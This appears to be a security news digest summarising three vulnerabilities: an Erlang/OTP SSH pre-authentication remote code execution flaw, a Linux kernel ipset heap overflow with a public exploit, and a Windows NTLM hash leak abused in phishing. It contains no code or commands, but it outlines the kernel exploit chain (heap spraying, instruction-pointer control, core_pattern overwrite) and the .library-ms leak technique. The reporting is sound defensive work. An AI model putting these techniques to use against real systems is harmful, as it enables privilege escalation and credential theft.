Critical RCE Flaw in Erlang/OTP SSH Daemon Poses Immediate Risk to High-Availability Systems
A critical vulnerability in the Erlang/OTP SSH daemon, tracked as CVE-2025-32433, has been disclosed and assigned a severity score of 10.0 due to its ability to allow unauthenticated remote code execution. The flaw stems from improper handling of pre-authentication protocol messages, enabling attackers to send specially crafted packets before authentication occurs. If exploited, the attacker can run arbitrary commands with the same privileges as the SSH daemon—often root—leading to full system compromise. The vulnerability affects all devices running the vulnerable Erlang/OTP SSH application, which is commonly deployed in telecom systems and fault-tolerant environments. Security researchers from Ruhr University Bochum discovered the issue, and versions 25.3.2.10 and 26.2.4 of Erlang/OTP have been released to address it. Security experts, including Horizon3’s Attack Team, have already replicated the flaw and created a working proof-of-concept, warning that exploitation is trivial and public PoCs are likely to follow soon. The risk of mass exploitation is high, especially in environments where Erlang-based services are exposed to the Internet. Organizations are strongly urged to apply the patches without delay. For devices that cannot be updated immediately—particularly those embedded in industrial or mission-critical systems—it is essential to restrict SSH access to known, trusted IP addresses or disable the SSH service altogether if it is not in use. Given the attack's simplicity and critical impact, this vulnerability represents an urgent threat that defenders must address proactively.
Critical Linux Kernel Vulnerability CVE-2024-53141 Poses High Risk Amid POC Release
A newly disclosed vulnerability in the Linux kernel’s ipset component, tracked as CVE-2024-53141, is drawing concern after security researchers released a working proof-of-concept exploit. The flaw exists in the bitmap_ip_uadt function within ip_set_bitmap_ip.c, where improper bounds checking allows for an out-of-bounds write on the kernel heap. Specifically, when the IPSET_ATTR_CIDR attribute is used without IPSET_ATTR_IP_TO, the calculated IP range can exceed allowed boundaries, leading to uncontrolled memory writes. This oversight enables attackers to manipulate kernel structures, making executing arbitrary code with elevated privileges possible. Since ipsets are foundational to Linux firewalls and IP filtering mechanisms, any compromise at this level directly threatens system integrity and security. The released exploit demonstrates a full attack chain, beginning with information leaks via ipset’s comment feature, followed by arbitrary memory writes using ipset counters. These primitives are combined with kernel heap manipulation techniques—such as heap spraying and triggering use-after-free conditions via kernel objects like pipe_buffer and msg_msgseg. Ultimately, the exploit redirects code execution by controlling the instruction pointer (RIP) and overwriting the core_pattern kernel parameter to invoke a custom binary with root-level permissions upon process crash. Given the availability of public exploit code and the vulnerability’s low complexity, the risk of widespread exploitation is high. Linux system administrators are strongly advised to apply patches immediately or deploy available mitigations. Environments relying on ipset for network filtering, particularly those with exposed or multi-tenant configurations, should prioritize this as a critical security issue. Continuous monitoring for abnormal ipset activity and memory access anomalies is recommended to detect potential exploitation attempts.
CVE-2025-24054 Exploited in Active Phishing Campaigns to Leak NTLM Hashes
A recently patched Windows vulnerability, CVE-2025-24054, entered active exploitation just weeks after Microsoft released a fix during its March 2025 Patch Tuesday. Initially rated as “less likely to be exploited,” this flaw is now being abused in phishing campaigns aimed at government and private-sector organizations, particularly in Poland and Romania. The attack leverages [.]library-ms files, which are normally used to display virtual folders in Windows. In this campaign, attackers crafted [.]library-ms files that point to malicious remote SMB servers. When victims interact with the file—by clicking, right-clicking, or even selecting it—Windows initiates an SMB connection to the attacker-controlled server, unintentionally sending NTLM authentication hashes. Check Point researchers observed that the earliest wave of attacks involved [.]library-ms files inside ZIP archives hosted on Dropbox, but by late March, the files were being distributed directly without compression, requiring even less user interaction. In addition to the [.]library-ms files, phishing bundles often included other shortcut files (xd[.]url, xd[.]website, xd[.]link) exploiting known NTLM hash exposure issues, likely to increase the chance of a successful leak. While Microsoft continues to phase out NTLM in favor of more secure protocols, many environments still rely on it, making this a valuable technique for attackers to obtain credentials that can later be cracked or replayed. Two IP addresses involved—159[.]196[.]128[.]120 and 194[.]127[.]179[.]157—were linked to these campaigns, though attribution remains inconclusive despite some overlap with infrastructure previously tied to APT28. Security teams are urged to apply March 2025 updates immediately, disable NTLM where feasible, and monitor SMB traffic for signs of credential leaks or unauthorized external connections.
